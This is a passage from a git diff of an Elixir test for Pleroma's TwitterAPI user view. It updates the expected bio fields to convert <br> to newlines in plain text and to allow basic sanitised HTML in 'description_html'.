HtmlSanitizeEx.strip_tags(user.bio |> String.replace("<br>", "\n")), + "description_html" => HtmlSanitizeEx.basic_html(user.bio), "created_at" => user.inserted_at |> Utils.format_naive_asctime(), "favourites_count" => 0, "statuses_count" => 0, @@ -144,8 +144,8 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "name" => follower.name, "screen_name" => follower.nickname, "name_html" => follower.name, - "description" => HtmlSanitizeEx.strip_tags(follower.bio), - "description_html" => HtmlSanitizeEx.strip_tags(follower.bio), + "description" => HtmlSanitizeEx.strip_tags(follower.bio |> String.replace("<br>", "\n")), + "description_html" => HtmlSanitizeEx.basic_html(follower.bio), "created_at" => follower.inserted_at |> Utils.format_naive_asctime(), "favourites_count" => 0, "statuses_count" => 0, @@ -191,8 +191,8 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do "name" => user.name, "screen_name" => user.nickname, "name_html" => user.name, - "description" => HtmlSanitizeEx.strip_tags(user.bio), - "description_html" => HtmlSanitizeEx.strip_tags(user.bio), + "description" => HtmlSanitizeEx.strip_tags(user.bio |> String.replace("<br>", "\n")), + "description_html" => HtmlSanitizeEx.basic_html(user.bio), "created_at" => user.inserted_at |> Utils.format_naive_asctime(), "favourites_count" => 0, "statuses_count" => 0, |